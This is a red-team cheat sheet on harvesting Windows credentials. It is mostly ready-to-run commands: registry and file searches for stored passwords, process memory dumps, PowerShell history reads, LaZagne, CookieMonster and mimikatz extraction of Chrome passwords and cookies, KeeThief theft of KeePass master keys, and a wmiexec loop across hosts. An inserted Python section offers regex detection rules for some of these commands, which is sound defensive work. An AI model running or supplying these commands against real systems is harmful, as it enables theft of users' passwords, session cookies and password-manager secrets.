Password mining

MSF

run post/windows/gather/credentials/credential_collector
clipboard_get_data (extapi)
cmdkey /list
dir /s *pass* == *cred* == *vnc* == *.config*
findstr /si <passw> *.xml *.ini *.txt *.vbs *.cmd *.ps1 *.bat *.inf *.eml

Sysprep / GPP

C:\sysprep.inf
C:\sysprep\sysprep.xml
%WINDIR%\Panther\Unattend
%WINDIR%\Panther
%WINDIR%\System32\Sysprep
scanner/smb/smb_enum_gpp
post/windows/gather/credentials/gpp

Process dump

procdump.exe -accepteula -ma <process_name/pid> <out.dmp>
strings <out.dmp>
PowerSploit.ps1: Out-minidump (Get-Process -Id <pid>)
Invoke-mimikittenz.ps1 (putterpanda)

Registry

Get-ItemProperty <registry_key>
reg query <registry_key>
reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
reg query HKCU\software\microsoft\windows\currentversion\explorer\runmru
reg query HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP
reg query HKCU\Software\SimonTatham\PuTTY\Sessions
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password
reg query HKCU\Software\TightVNC\Server
reg query HKLM /f passw /t REG_SZ /s
reg query HKCU /f passw /t REG_SZ /s

AutoLogon

PowerUp.ps1: Get-RegAutoLogon
post/windows/gather/credentials/windows_autologin

Config files

McAfee: PowerUp.ps1: Get-SiteListPassword
Web.config: PowerUp.ps1: Get-WebConfig
Cached SAM: C:\Windows\Repair (Win XP)
findstr.exe /si passw *.txt *.ini *.vbs *.cmd *.ps1 *.bat *.xml *.inf *.eml

Powershell

type C:\Users\<user>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw
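The commands above leave a recognisable footprint in process-creation telemetry (Windows 4688 / Sysmon event 1). The following is an added example, not part of the original cheat sheet: a small Python triage helper with hypothetical rule names that flags the password-mining command lines listed on this page in a constructed set of sample command lines.

```python
import re

# Constructed sample of process-creation command lines (e.g. 4688 / Sysmon 1 CommandLine
# fields); these are made up for the example, not taken from a real host.
SAMPLE_COMMAND_LINES = [
    r'reg query HKLM /f passw /t REG_SZ /s',
    r'findstr /si passw *.txt *.ini *.vbs *.cmd *.ps1 *.bat *.xml *.inf *.eml',
    r'cmdkey /list',
    r'procdump.exe -accepteula -ma 1234 out.dmp',
    r'reg query HKCU\Software\SimonTatham\PuTTY\Sessions',
    r'type C:\Users\alice\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt',
    r'reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',  # benign admin lookup
    r'dir C:\Users\alice\Documents',                                  # benign
]

# Each rule: (hypothetical rule name, regex over the command line). The patterns mirror the
# commands listed on this page; tune them per environment (e.g. allowlist known admin scripts).
RULES = [
    ("reg_query_password_search", re.compile(r'\breg(\.exe)?\s+query\b.*\s/f\s+\S*passw', re.I)),
    ("reg_query_credential_key", re.compile(
        r'\breg(\.exe)?\s+query\b.*(Winlogon|PuTTY\\Sessions|WinVNC4|TightVNC|Services\\SNMP)', re.I)),
    ("findstr_password_grep", re.compile(r'\bfindstr(\.exe)?\s+/si\s+\S*passw', re.I)),
    ("cmdkey_list", re.compile(r'\bcmdkey(\.exe)?\s+/list\b', re.I)),
    ("procdump_full_dump", re.compile(r'\bprocdump(64)?(\.exe)?\b.*\s-ma\b', re.I)),
    ("psreadline_history_read", re.compile(r'PSReadline\\ConsoleHost_history\.txt', re.I)),
]


def classify(command_line):
    """Return the names of all rules matched by one command line (empty list if none)."""
    return [name for name, rx in RULES if rx.search(command_line)]


def scan(command_lines):
    """Map each suspicious command line to the rules it triggered; benign lines are omitted."""
    hits = {}
    for cl in command_lines:
        matched = classify(cl)
        if matched:
            hits[cl] = matched
    return hits


if __name__ == "__main__":
    for cl, names in scan(SAMPLE_COMMAND_LINES).items():
        print(f"[{', '.join(names)}] {cl}")
```

Feed real CommandLine fields into scan() and review the hits alongside the parent process and user to separate admin housekeeping from credential hunting.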

LaZagne

https://github.com/AlessandroZ/LaZagne/releases

laZagne.exe all

Chrome passwords and cookies

In all cases, Chrome must be shut down when you collect clear-text passwords. The tools must be run in the context of the targeted user.

CookieMonster

https://github.com/rasta-mouse/CookieMonster

CookieMonster creds
CookieMonster.exe cookies [-d <domain>] -e
CookieMonster -a

Mimikatz

If the user's context cannot be obtained, see the other scenarios described at: https://www.harmj0y.net/blog/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/

mimikatz dpapi::chrome /in:"C:\Users\<USER>\AppData\Local\Google\Chrome\User Data\Default\Login Data"
mimikatz dpapi::chrome /in:"C:\Users\<USER>\AppData\Local\Google\Chrome\User Data\Default\Login Data" /unprotect
mimikatz dpapi::chrome /in:"C:\Users\<USER>\AppData\Local\Google\Chrome\User Data\Default\Cookies" /unprotect

Keepass

Resources

https://github.com/HarmJ0y/KeeThief
http://www.harmj0y.net/blog/redteaming/keethief-a-case-study-in-attacking-keepass-part-2/

Detect Keepass

tasklist | findstr /I keepass
Get-Process keepass

List workstations running KeePass from an RCE (WMI)

for ip in $(cat <list_ip.txt>); do wmiexec.py <username>:<password>@$ip 'tasklist | findstr /I keepass' | grep -i keepass 1>/dev/null && echo "[+] Found KeePass process on $ip"; done

Attack

Powershell

https://raw.githubusercontent.com/HarmJ0y/KeeThief/master/PowerShell/KeeThief.ps1
Import-Module KeeThief.ps1
Get-KeePassDatabaseKey -Verbose

Executable

Copy both files into the same directory on the target workstation and run the binary.

If KeePass requires a key file, a Windows user account, or both, use KeePatched.exe.